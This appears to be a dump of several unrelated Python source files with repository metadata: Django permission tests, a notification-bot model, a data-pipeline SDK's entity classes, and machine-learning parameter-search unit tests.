def test_document_metadata_put_view_no_access(self):
self._create_document_metadata()
response = self._request_document_metadata_edit_view_via_put()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_document_metadata.refresh_from_db()
self.assertEqual(self.test_document_metadata.value, TEST_METADATA_VALUE)
def test_document_metadata_put_view_with_access(self):
self._create_document_metadata()
self.grant_access(
obj=self.test_document,
permission=permission_document_metadata_edit
)
response = self._request_document_metadata_edit_view_via_put()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.test_document_metadata.refresh_from_db()
self.assertEqual(
response.data['value'], TEST_METADATA_VALUE_EDITED
)
self.assertEqual(
self.test_document_metadata.value, TEST_METADATA_VALUE_EDITED
)
| 39.370175 | 88 | 0.71102 | 2,567 | 22,441 | 5.719907 | 0.043631 | 0.133215 | 0.077368 | 0.084996 | 0.904447 | 0.890077 | 0.856228 | 0.831914 | 0.807737 | 0.776817 | 0 | 0.00702 | 0.212825 | 22,441 | 569 | 89 | 39.439367 | 0.824172 | 0 | 0 | 0.575824 | 0 | 0 | 0.048215 | 0.023261 | 0 | 0 | 0 | 0 | 0.162637 | 1 | 0.118681 | false | 0 | 0.01978 | 0.032967 | 0.18022 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ab22e87fccac5bbe3bba1f0b036a8c105554c976 | 88 | py | Python | django_weasyprint/__init__.py | Rockrdx710/django-weasyprint | 504ecbe3afb537bb9f6a8b33520c06e366aa9dae | [
"Apache-2.0"
] | 250 | 2016-08-05T11:24:11.000Z | 2022-03-30T13:36:45.000Z | django_weasyprint/__init__.py | Rockrdx710/django-weasyprint | 504ecbe3afb537bb9f6a8b33520c06e366aa9dae | [
"Apache-2.0"
] | 51 | 2016-08-05T15:26:30.000Z | 2022-03-11T10:40:27.000Z | django_weasyprint/__init__.py | Rockrdx710/django-weasyprint | 504ecbe3afb537bb9f6a8b33520c06e366aa9dae | [
"Apache-2.0"
] | 50 | 2016-08-05T12:52:26.000Z | 2021-12-09T12:36:32.000Z | from .views import WeasyTemplateResponseMixin, WeasyTemplateView, WeasyTemplateResponse
| 44 | 87 | 0.897727 | 6 | 88 | 13.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 88 | 1 | 88 | 88 | 0.963415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ab5bbca07b2ffa1ea9f6558a99b0bfe50c894334 | 45 | py | Python | env/lib/python2.7/site-packages/wtforms/ext/csrf/__init__.py | lindamar/ecclesi | cad07fc78daf6facd1b74cc1cb1872aaf4771fa2 | [
"MIT"
] | 481 | 2015-01-04T13:39:05.000Z | 2021-12-05T14:58:16.000Z | env/lib/python3.6/site-packages/wtforms/ext/csrf/__init__.py | amogh-gulati/corona_dashboard | ce1a20ad56bdfb758d41513b4706fe3a47764c32 | [
"MIT"
] | 309 | 2016-10-27T23:47:06.000Z | 2017-04-02T04:40:21.000Z | lib/python2.7/site-packages/wtforms/ext/csrf/__init__.py | anish03/weather-dash | d517fa9da9028d1fc5d8fd71d77cee829ddee87b | [
"MIT"
] | 127 | 2015-01-01T14:14:02.000Z | 2021-12-05T14:58:17.000Z | from wtforms.ext.csrf.form import SecureForm
| 22.5 | 44 | 0.844444 | 7 | 45 | 5.428571 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.926829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ab5c8e440c0e3469cb870c953e8baa257e5b753f | 1,331 | py | Python | backend/notices/models.py | itimor/one-ops | f1111735de252012752dfabe11598e9690c89257 | [
"MIT"
] | null | null | null | backend/notices/models.py | itimor/one-ops | f1111735de252012752dfabe11598e9690c89257 | [
"MIT"
] | 6 | 2021-03-19T10:20:05.000Z | 2021-09-22T19:30:21.000Z | backend/notices/models.py | itimor/one-ops | f1111735de252012752dfabe11598e9690c89257 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# author: itimor
from django.db import models
from common.models import BaseModel
notice_type = {
0: 'mail',
1: 'telegram',
}
class MailBot(BaseModel):
type = models.CharField(max_length=10, choices=tuple(notice_type.items()), default=0, verbose_name='notification type')
name = models.CharField(max_length=112, unique=True, verbose_name='name')
host = models.CharField(max_length=112, verbose_name='host')
user = models.CharField(max_length=112, verbose_name='account')
password = models.CharField(max_length=112, verbose_name='password')
to = models.CharField(max_length=112, verbose_name='recipient')
def __str__(self):
return self.name
class Meta:
verbose_name = "邮件机器人"
verbose_name_plural = verbose_name
class TelegramBot(BaseModel):
type = models.CharField(max_length=10, choices=tuple(notice_type.items()), default=1, verbose_name='notification type')
name = models.CharField(max_length=112, unique=True, verbose_name='name')
uid = models.CharField(max_length=112, verbose_name='account id')
token = models.CharField(max_length=112, verbose_name='token')
chat_id = models.CharField(max_length=112, verbose_name='chat_id')
def __str__(self):
return self.name
class Meta:
verbose_name = "tg机器人"
verbose_name_plural = verbose_name
| 31.690476 | 110 | 0.701728 | 178 | 1,331 | 5.005618 | 0.320225 | 0.209877 | 0.222222 | 0.296296 | 0.7789 | 0.716049 | 0.716049 | 0.417508 | 0.417508 | 0.417508 | 0 | 0.032638 | 0.1713 | 1,331 | 41 | 111 | 32.463415 | 0.775159 | 0.027047 | 0 | 0.344828 | 0 | 0 | 0.045666 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0.034483 | 0.068966 | 0.068966 | 0.724138 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
dba9c8b932298747256b4a3e45ae13680bc774b5 | 22,711 | py | Python | flycs_sdk/entities.py | devoteamgcloud/flycs_sdk | d11a0c0057033572543e0e17704e1f401a14647e | [
"MIT"
] | null | null | null | flycs_sdk/entities.py | devoteamgcloud/flycs_sdk | d11a0c0057033572543e0e17704e1f401a14647e | [
"MIT"
] | 1 | 2022-03-01T10:16:06.000Z | 2022-03-01T12:22:16.000Z | flycs_sdk/entities.py | devoteamgcloud/flycs_sdk | d11a0c0057033572543e0e17704e1f401a14647e | [
"MIT"
] | null | null | null | """Module containing entity classes."""
from typing import Dict, List, Optional, Union
from .custom_code import CustomCode
from enum import Enum
from .transformations import Transformation
from .views import View
class ConflictingNameError(ValueError):
"""Raised when trying to insert a Transformation or View into an entities \
that already contains a Transformation or View with the same name."""
pass
class EntityKind(Enum):
"""This enumeration contains all the supported entity types."""
VANILLA = "vanilla"
DELTA_TRACKING = "delta_tracking"
DATA_VAULT = "data_vault"
class Entity:
"""Class that serves as a version configuration for a logical subset of a Pipeline."""
def __init__(
self,
name: str,
version: str,
kind: Optional[EntityKind] = None,
stage_config: Optional[Dict[str, Dict[str, str]]] = None,
custom_operators: Optional[Dict[str, List[CustomCode]]] = None,
location: Optional[str] = None,
):
"""
Create an Entity object.
:param name: the name of the entity
:param version: the version of the entity; this can be used for naming the tables this entity belongs to.
:param kind: the kind of the entity
:param stage_config: a dictionary with the name of the stage as key and a dictionary of query names
and their versions as value.
:param custom_operators: a dictionary with the name of the stage as key and, as value, a list
of CustomCode objects allowing custom Airflow operators to be injected
into the pipeline
:type custom_operators: dict
:param location: The location in which to create the associated dataset. This field is optional and only needed when you want to
manually overwrite the default dataset location configured in the environment.
"""
self.name = name
self.version = version
self.kind = kind
self.stage_config = stage_config or {}
self.transformations = {}
self.custom_operators = custom_operators or {}
self.location = location
@classmethod
def from_dict(cls, d: dict):
"""
Create an Entity object from a dictionary created with the to_dict method.
:param d: source dictionary
:type d: dict
:return: Entity
:rtype: Entity
"""
stage_config = {stage["name"]: stage["versions"] for stage in d["stage_config"]}
return cls(
name=d["name"],
version=d["version"],
kind=EntityKind(d["kind"]) if d.get("kind") is not None else None,
stage_config=stage_config,
location=d.get("location"),
)
@property
def stages(self):
"""Return a list of all the stages defined in this entity."""
return list(self.stage_config.keys())
def get_stage_versions(self, stage: str) -> Dict[str, str]:
"""
Get the versions of the queries in the given stage.
:param stage: the stage to get the versions for
:return: the versions of the queries in the given stage
"""
return self.stage_config[stage]
def _insert_into_stage_config(self, stage: str, obj: Union[Transformation, View]):
if stage not in self.stage_config:
self.stage_config[stage] = {}
if obj.name in self.stage_config[stage]:
raise ConflictingNameError(
"an object with name {obj.name} already exists in stage {stage}"
)
self.stage_config[stage].update({obj.name: obj.version})
if stage not in self.transformations:
self.transformations[stage] = {}
if obj.name in self.transformations[stage]:
raise ConflictingNameError(
"an object with name {obj.name} already exists in stage {stage}"
)
self.transformations[stage].update({obj.name: obj})
def add_transformation(self, stage: str, transformation: Transformation):
"""Insert a Transformation into the stage_config of the entity.
:param stage: the name of the stage where to insert the transformation
:type stage: str
:param transformation: the transformation object to insert
:type transformation: Transformation
"""
self._insert_into_stage_config(stage, transformation)
def add_view(self, stage: str, view: View):
"""Insert a View into the stage_config of the entity.
:param stage: the name of the stage where to insert the view
:type stage: str
:param view: the View object to insert
:type view: View
"""
self._insert_into_stage_config(stage, view)
def to_dict(self) -> Dict:
"""
Serialize the entity to a dictionary object.
:return: the entity as a dictionary object.
"""
return {
"name": self.name,
"version": self.version,
"kind": self.kind.value if self.kind is not None else None,
"stage_config": [
{"name": stage, "versions": self.get_stage_versions(stage)}
for stage in self.stage_config.keys()
]
if self.stage_config is not None
else [],
"location": self.location,
}
def __eq__(self, other):
"""Implement the __eq__ method."""
return (
self.name == other.name
and self.version == other.version
and self.stage_config == other.stage_config
and self.kind == other.kind
and self.location == other.location
)
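# A minimal illustrative sketch of typical Entity usage (the names and
# versions below are placeholders, not part of the SDK):
def _entity_usage_sketch():
    entity = Entity(
        name="customer",
        version="1.0.0",
        kind=EntityKind.VANILLA,
        stage_config={"staging": {"clean_customers": "1.0.0"}},
    )
    assert entity.get_stage_versions("staging") == {"clean_customers": "1.0.0"}
    # The to_dict/from_dict pair round-trips to an equal entity
    assert Entity.from_dict(entity.to_dict()) == entity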
class BaseLayerEntity(Entity):
"""Class that serves as a version configuration for a logical subset of a Pipeline with fixed layers."""
_stages = ["datalake", "preamble", "staging", "data_warehouse", "data_mart"]
def __init__(
self,
name: str,
version: str,
kind: Optional[EntityKind] = None,
datalake_versions: Dict[str, str] = None,
preamble_versions: Dict[str, str] = None,
staging_versions: Dict[str, str] = None,
data_warehouse_versions: Dict[str, str] = None,
data_mart_versions: Dict[str, str] = None,
):
"""
Create a BaseLayerEntity object.
A BaseLayerEntity should be used when the standard layer configuration applies,
meaning there are 5 fixed layers: datalake, preamble, staging, data_warehouse and data_mart.
:param name: the name of the entity
:param version: the version of the entity; this can be used for naming
the tables this entity belongs to.
:param kind: the kind of the entity
:param datalake_versions: the versions of the queries for the datalake stage
:param preamble_versions: the versions of the queries for the preamble stage
:param staging_versions: the versions of the queries for the staging stage
:param data_warehouse_versions: the versions of the queries for the data warehouse stage
:param data_mart_versions: the versions of the queries for the data mart stage
"""
super().__init__(name, version, kind)
self.datalake_versions = datalake_versions
self.preamble_versions = preamble_versions
self.staging_versions = staging_versions
self.data_warehouse_versions = data_warehouse_versions
self.data_mart_versions = data_mart_versions
self.stage_config = self.get_stage_config()
@classmethod
def from_dict(cls, d: dict):
"""Create an BaseLayerEntity object form a dictionnary created with the to_dict method.
:param d: source dictionary
:type d: dict
:return: BaseLayerEntity
:rtype: BaseLayerEntity
"""
entity = cls(
name=d["name"],
version=d["version"],
kind=EntityKind(d["kind"]) if d.get("kind") is not None else None,
)
for stage in d.get("stage_config", {}):
if stage["name"] == "datalake":
entity.datalake_versions = stage["versions"]
elif stage["name"] == "preamble":
entity.preamble_versions = stage["versions"]
if stage["name"] == "staging":
entity.staging_versions = stage["versions"]
if stage["name"] == "data_warehouse":
entity.data_warehouse_versions = stage["versions"]
if stage["name"] == "data_mart":
entity.data_mart_versions = stage["versions"]
entity.stage_config = entity.get_stage_config()
return entity
@property
def stages(self):
"""Return a list of all the stages defined in this entity."""
return self._stages.copy()
def get_stage_config(self):
"""
Get the stage config for a base layer entity based on the fixed stages in the BaseLayerEntity.
:return: a dictionary in the form of a stage config
"""
return {stage: self.get_stage_versions(stage) for stage in self._stages}
def get_stage_versions(self, stage: str) -> Dict[str, str]:
"""
Get the versions of the queries in the given stage.
:param stage: the stage to get the versions for
:return: the versions of the queries in the given stage
"""
if stage == "datalake":
return self.get_datalake_versions()
elif stage == "preamble":
return self.get_preamble_versions()
if stage == "staging":
return self.get_staging_versions()
if stage == "data_warehouse":
return self.get_data_warehouse_versions()
if stage == "data_mart":
return self.get_data_mart_versions()
def get_datalake_versions(self) -> Dict[str, str]:
"""
Get the versions of the queries in the datalake stage.
:return: the versions of the queries in the datalake stage
"""
if self.datalake_versions is None:
return {}
else:
return self.datalake_versions
def get_preamble_versions(self) -> Dict[str, str]:
"""
Get the versions of the queries in the preamble stage.
:return: the versions of the queries in the preamble stage
"""
if self.preamble_versions is None:
return {}
else:
return self.preamble_versions
def get_staging_versions(self) -> Dict[str, str]:
"""
Get the versions of the queries in the staging stage.
:return: the versions of the queries in the staging stage
"""
if self.staging_versions is None:
return {}
else:
return self.staging_versions
def get_data_warehouse_versions(self) -> Dict[str, str]:
"""
Get the versions of the queries in the data warehouse stage.
:return: the versions of the queries in the data warehouse stage
"""
if self.data_warehouse_versions is None:
return {}
else:
return self.data_warehouse_versions
def get_data_mart_versions(self) -> Dict[str, str]:
"""
Get the versions of the queries in the data mart stage.
:return: the versions of the queries in the data mart stage
"""
if self.data_mart_versions is None:
return {}
else:
return self.data_mart_versions
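# A minimal usage sketch (illustrative values only, assuming the constructor
# signature documented above): stages that were not given any versions
# resolve to an empty dict rather than None.
#
# entity = BaseLayerEntity(
#     name="orders", version="1",
#     staging_versions={"clean_orders": "2"},
# )
# entity.get_stage_versions("staging")   # -> {"clean_orders": "2"}
# entity.get_stage_versions("datalake")  # -> {}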
class ParametrizedEntity:
"""Class that serves as a version configuration for a logical subset of a ParametrizedPipeline."""
def __init__(
self,
name: str,
version: str,
kind: Optional[EntityKind] = None,
stage_config: Optional[Dict[str, Dict[str, str]]] = None,
custom_operators: Optional[Dict[str, List[CustomCode]]] = None,
location: Optional[str] = None,
):
"""
Create a ParametrizedEntity object.
A parametrized entity should be combined with a parametrized pipeline. This allows developers to make the
behavior of the entity dynamic based on the parameters from the pipeline.
:param name: the name of the entity
:param version: the version of the entity; this can be used for naming the tables
this entity belongs to.
:param kind: the kind of the entity
:param stage_config: a dictionary with the name of the stage as key and a dictionary of query names
and their versions as value.
:param custom_operators: a dictionary with the name of the stage as key and a list
of CustomCode objects allowing to inject custom Airflow operator
into the pipeline as value
:param location: The location in which to create the associated dataset. This field is optional and only needed when you want to
manually overwrite the default dataset location configured in the environment.
"""
self.name = name
self.version = version
self.kind = kind
self.stage_config = stage_config or {}
self.transformations = {}
self.custom_operators = custom_operators or {}
self.location = location
@classmethod
def from_dict(cls, d: dict):
"""Create an ParametrizedEntity object form a dictionnary created with the to_dict method.
:param d: source dictionary
:type d: dict
:return: ParametrizedEntity
:rtype: ParametrizedEntity
"""
stage_config = {stage["name"]: stage["versions"] for stage in d["stage_config"]}
return cls(
name=d["name"],
version=d["version"],
kind=EntityKind(d["kind"]) if d.get("kind") is not None else None,
stage_config=stage_config,
location=d.get("location"),
)
@property
def stages(self):
"""Return a list of all the stages defined in this entity."""
return list(self.stage_config.keys())
def get_stage_versions(
self, stage: str, parameters: Dict[str, str] = None
) -> Dict[str, str]:
"""
Get the versions of the queries in the given stage.
:param stage: the stage to get the versions for
:param parameters: the pipeline parameters
:return: the versions of the queries in the given stage
"""
return self.stage_config[stage]
def to_dict(self, parameters: Dict[str, str] = None) -> Dict:
"""
Serialize the entity to a dictionary object.
:param parameters: the pipeline parameters
:return: the entity as a dictionary object.
"""
return {
"name": _parametrized_name(self.name, parameters),
"version": self.version,
"kind": self.kind.value if self.kind is not None else None,
"stage_config": [
{"name": stage, "versions": self.get_stage_versions(stage, parameters)}
for stage in self.stage_config.keys()
],
"location": self.location,
}
def __eq__(self, other):
"""Implement the __eq__ method."""
return (
self.name == other.name
and self.version == other.version
and self.stage_config == other.stage_config
and self.kind == other.kind
and self.location == other.location
)
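# A round-trip sketch (illustrative values only): to_dict serializes
# stage_config as a list of {"name", "versions"} entries and parametrizes
# the entity name, while from_dict folds that list back into a mapping.
#
# entity = ParametrizedEntity(
#     name="orders", version="1",
#     stage_config={"staging": {"clean_orders": "2"}},
# )
# as_dict = entity.to_dict(parameters={"region": "eu"})
# # as_dict["name"] == "orders_eu"
# restored = ParametrizedEntity.from_dict(as_dict)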
class ParametrizedBaseLayerEntity(ParametrizedEntity):
"""Class that serves as a version configuration for a logical subset of a ParametrizedPipeline with fixed layers."""
_stages = ["datalake", "preamble", "staging", "data_warehouse", "data_mart"]
def __init__(
self,
name: str,
version: str,
kind: Optional[EntityKind] = None,
datalake_versions: Dict[str, str] = None,
preamble_versions: Dict[str, str] = None,
staging_versions: Dict[str, str] = None,
data_warehouse_versions: Dict[str, str] = None,
data_mart_versions: Dict[str, str] = None,
):
"""
Create a ParametrizedBaseLayerEntity object.
A ParametrizedBaseLayerEntity should be used when the standard layer configuration applies.
This means there are 5 layers: datalake, preamble, staging, data_warehouse and data_mart.
:param name: the name of the entity
:param version: the version of the entity; this can be used for naming the tables
this entity belongs to.
:param kind: the kind of the entity
:param datalake_versions: the versions of the queries for the datalake stage
:param preamble_versions: the versions of the queries for the preamble stage
:param staging_versions: the versions of the queries for the staging stage
:param data_warehouse_versions: the versions of the queries for the data warehouse stage
:param data_mart_versions: the versions of the queries for the data mart stage
"""
super().__init__(name, version, kind)
self.datalake_versions = datalake_versions
self.preamble_versions = preamble_versions
self.staging_versions = staging_versions
self.data_warehouse_versions = data_warehouse_versions
self.data_mart_versions = data_mart_versions
self.stage_config = self.get_stage_config()
@classmethod
def from_dict(cls, d: dict):
"""Create an ParametrizedBaseLayerEntity object form a dictionnary created with the to_dict method.
:param d: source dictionary
:type d: dict
:return: ParametrizedBaseLayerEntity
:rtype: ParametrizedBaseLayerEntity
"""
entity = cls(
name=d["name"],
version=d["version"],
kind=EntityKind(d["kind"]) if d.get("kind") is not None else None,
)
# to_dict serializes the stage versions as a stage_config list, so read
# them back from there instead of expecting flat *_versions keys
for stage in d.get("stage_config", []):
if stage["name"] == "datalake":
entity.datalake_versions = stage["versions"]
elif stage["name"] == "preamble":
entity.preamble_versions = stage["versions"]
elif stage["name"] == "staging":
entity.staging_versions = stage["versions"]
elif stage["name"] == "data_warehouse":
entity.data_warehouse_versions = stage["versions"]
elif stage["name"] == "data_mart":
entity.data_mart_versions = stage["versions"]
entity.stage_config = entity.get_stage_config()
return entity
@property
def stages(self):
"""Return a list of all the stages defined in this entity."""
return self._stages.copy()
def get_stage_config(self, parameters: Dict[str, str] = None):
"""
Get the stage config for a base layer entity based on the fixed stages in the BaseLayerEntity.
:param parameters: the pipeline parameters to get the config for
:return: a dictionary in the form of a stage config
"""
return {stage: self.get_stage_versions(stage) for stage in self._stages}
def get_stage_versions(
self, stage: str, parameters: Dict[str, str] = None
) -> Dict[str, str]:
"""
Get the versions of the queries in the given stage.
:param stage: the stage to get the versions for
:param parameters: the pipeline parameters to get the versions for
:return: the versions of the queries in the given stage
"""
if stage == "datalake":
return self.get_datalake_versions(parameters)
elif stage == "preamble":
return self.get_preamble_versions(parameters)
if stage == "staging":
return self.get_staging_versions(parameters)
if stage == "data_warehouse":
return self.get_data_warehouse_versions(parameters)
if stage == "data_mart":
return self.get_data_mart_versions(parameters)
def get_datalake_versions(
self, parameters: Dict[str, str] = None
) -> Dict[str, str]:
"""
Get the versions of the queries in the datalake stage.
:param parameters: the pipeline parameters to get the versions for
:return: the versions of the queries in the datalake stage
"""
if self.datalake_versions is None:
return {}
else:
return self.datalake_versions
def get_preamble_versions(
self, parameters: Dict[str, str] = None
) -> Dict[str, str]:
"""
Get the versions of the queries in the preamble stage.
:param parameters: the pipeline parameters to get the versions for
:return: the versions of the queries in the preamble stage
"""
if self.preamble_versions is None:
return {}
else:
return self.preamble_versions
def get_staging_versions(self, parameters: Dict[str, str] = None) -> Dict[str, str]:
"""
Get the versions of the queries in the staging stage.
:param parameters: the pipeline parameters to get the versions for
:return: the versions of the queries in the staging stage
"""
if self.staging_versions is None:
return {}
else:
return self.staging_versions
def get_data_warehouse_versions(
self, parameters: Dict[str, str] = None
) -> Dict[str, str]:
"""
Get the versions of the queries in the data warehouse stage.
:param parameters: the pipeline parameters to get the versions for
:return: the versions of the queries in the data warehouse stage
"""
if self.data_warehouse_versions is None:
return {}
else:
return self.data_warehouse_versions
def get_data_mart_versions(
self, parameters: Dict[str, str] = None
) -> Dict[str, str]:
"""
Get the versions of the queries in the data mart stage.
:param parameters: the pipeline parameters to get the versions for
:return: the versions of the queries in the data mart stage
"""
if self.data_mart_versions is None:
return {}
else:
return self.data_mart_versions
def _parametrized_name(name: str, parameters: Dict[str, str]) -> str:
"""Generate a unique entity name that includes the parameters value.
:param name: original name
:type name: str
:param parameters: the parameters to apply
:type parameters: dict
:return: the parametrized name
:rtype: str
"""
if not parameters:
return name
# must follow https://cloud.google.com/bigquery/docs/datasets#dataset-naming
parts = [name, *parameters.values()]
new_name = "_".join(parts)
if len(new_name) > 1024:
raise ValueError(
f"the size of the name ({new_name}) is to big, maximum size is 1024 characters"
)
return new_name
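# For example (illustrative values only), parameter values are appended to
# the name in insertion order:
#
# _parametrized_name("orders", {"region": "eu", "year": "2021"})
# # -> "orders_eu_2021"
# _parametrized_name("orders", {})  # -> "orders"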
| 37.538843 | 135 | 0.623927 | 2,783 | 22,711 | 4.974488 | 0.070787 | 0.02167 | 0.035683 | 0.043918 | 0.83408 | 0.823606 | 0.812337 | 0.799335 | 0.777521 | 0.770153 | 0 | 0.000626 | 0.296552 | 22,711 | 604 | 136 | 37.600993 | 0.865924 | 0.376029 | 0 | 0.692308 | 0 | 0 | 0.067451 | 0.001817 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0.003205 | 0.016026 | 0 | 0.320513 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dbbf08749f4778347fdd5ca74691fca498cef1f0 | 6,492 | py | Python | AppVoor/tests/parameter_search_test.py | Noczio/VoorSpelling | 51e30ab3f3b2e346c6eb56578818020e142a3adb | [
"BSD-3-Clause"
] | 3 | 2020-10-09T06:15:14.000Z | 2021-04-27T02:04:28.000Z | AppVoor/tests/parameter_search_test.py | Noczio/VoorSpelling | 51e30ab3f3b2e346c6eb56578818020e142a3adb | [
"BSD-3-Clause"
] | 17 | 2020-09-10T20:22:01.000Z | 2020-12-21T04:57:03.000Z | AppVoor/tests/parameter_search_test.py | Noczio/VoorSpelling | 51e30ab3f3b2e346c6eb56578818020e142a3adb | [
"BSD-3-Clause"
] | null | null | null | import unittest
from resources.backend_scripts.estimator_creation import EstimatorCreator
from resources.backend_scripts.load_data import LoaderCreator
from resources.backend_scripts.parameter_search import BayesianSearchParametersPossibilities
from resources.backend_scripts.parameter_search import GridSearchParametersPossibilities
from resources.backend_scripts.parameter_search import ParameterSearchCreator
from resources.backend_scripts.split_data import SplitterReturner
class MyTestCase(unittest.TestCase):
_loader_creator = LoaderCreator()
_param_search_creator = ParameterSearchCreator()
_estimator_creator = EstimatorCreator()
def test_molecules_SVC_bayesian_search(self):
# path to molecules.csv file in project
path = ".\\..\\datasets\\molecules.csv"
# get df with loader creator
csv_type = self._loader_creator.create_loader(path, "TSV")
df = csv_type.get_file_transformed()
df = df.drop(["m_name"], axis=1)
# split df into x and y
x, y = SplitterReturner.split_x_y_from_df(df)
# create a simple SVC estimator
model = self._estimator_creator.create_estimator("SVC")
# create a prm variable that stores the param grid to search
prm = BayesianSearchParametersPossibilities.case("SVC")
# create a ps variable that stores a bayesian search object
ps = self._param_search_creator.create_parameter_selector("BS")
# get best params from ps.search_parameters
best_prm, score = ps.search_parameters(x, y, prm, 10, model, "accuracy")
print(best_prm)
print(score)
def test_wine_quality_LASSO_BS(self):
# path to winequality-red.csv file in project
path = ".\\..\\datasets\\winequality-red.csv"
# get df with loader creator
scsv_type = self._loader_creator.create_loader(path, "SCSV")
df = scsv_type.get_file_transformed()
# create a prm variable to store params grid
initial_prm = BayesianSearchParametersPossibilities.case("Lasso")
# create an estimator using EstimatorCreator
estimator = self._estimator_creator.create_estimator("Lasso")
# split df into x and y
splitter = SplitterReturner()
x, y = splitter.split_x_y_from_df(df)
# create a ps variable that stores a grid search object
ps = self._param_search_creator.create_parameter_selector("BS")
# get best params from ps.search_parameters
best_prm, score = ps.search_parameters(x, y, initial_prm, 10, estimator, "r2")
print(best_prm)
print(score)
def test_diabetes_lsvc_search_bs(self):
# path to diabetes.csv file in project
path = ".\\..\\datasets\\diabetes.csv"
# get df with loader creator
csv_type = self._loader_creator.create_loader(path, "CSV")
df = csv_type.get_file_transformed()
# split df into x and y
x, y = SplitterReturner.split_x_y_from_df(df)
# create a simple linearSVC estimator
model = self._estimator_creator.create_estimator("LinearSVC")
# create a prm variable that stores the param grid to search
prm = BayesianSearchParametersPossibilities.case("LinearSVC")
# create a ps variable that stores a bayesian search object
ps = self._param_search_creator.create_parameter_selector("BS")
# get best params from ps.search_parameters
best_prm, _ = ps.search_parameters(x, y, prm, 10, model, "accuracy")
print(best_prm)
def test_wine_quality_LASSO_GS(self):
# path to winequality-white.csv file in project
path = ".\\..\\datasets\\winequality-white.csv"
# get df with loader creator
scsv_type = self._loader_creator.create_loader(path, "SCSV")
df = scsv_type.get_file_transformed()
# create a prm variable to store params grid
initial_prm = GridSearchParametersPossibilities.case("Lasso")
# create an estimator using EstimatorCreator
estimator = self._estimator_creator.create_estimator("Lasso")
# split df into x and y
splitter = SplitterReturner()
x, y = splitter.split_x_y_from_df(df)
# create a ps variable that stores a grid search object
ps = self._param_search_creator.create_parameter_selector("GS")
# get best params from ps.search_parameters
best_prm, _ = ps.search_parameters(x, y, initial_prm, 10, estimator, "r2")
print(best_prm)
def test_molecules_SVC_grid_search(self):
# path to molecules.csv file in project
path = ".\\..\\datasets\\molecules.csv"
# get df with loader creator
csv_type = self._loader_creator.create_loader(path, "TSV")
df = csv_type.get_file_transformed()
df = df.drop(["m_name"], axis=1)
# split df into x and y
splitter = SplitterReturner()
x, y = splitter.split_x_y_from_df(df)
# create a simple SVC estimator
model = self._estimator_creator.create_estimator("SVC")
# create a prm variable that stores the param grid to search
prm = GridSearchParametersPossibilities.case("SVC")
# create a ps variable that stores a grid search object
ps = self._param_search_creator.create_parameter_selector("GS")
# get best params from ps.search_parameters
best_prm, score = ps.search_parameters(x, y, prm, 10, model, "accuracy")
print(best_prm, score)
def test_diabetes_LSVC_grid_search(self):
# path to diabetes.csv file in project
path = ".\\..\\datasets\\diabetes.csv"
# get df with loader creator
csv_type = self._loader_creator.create_loader(path, "CSV")
df = csv_type.get_file_transformed()
# split df into x and y
splitter = SplitterReturner()
x, y = splitter.split_x_y_from_df(df)
# create a simple linearSVC estimator
model = self._estimator_creator.create_estimator("LinearSVC")
# create a prm variable that stores the param grid to search
prm = GridSearchParametersPossibilities.case("LinearSVC")
# create a ps variable that stores a grid search object
ps = self._param_search_creator.create_parameter_selector("GS")
# get best params from ps.search_parameters
best_prm, score = ps.search_parameters(x, y, prm, 10, model, "accuracy")
print(best_prm)
print(score)
if __name__ == '__main__':
unittest.main()
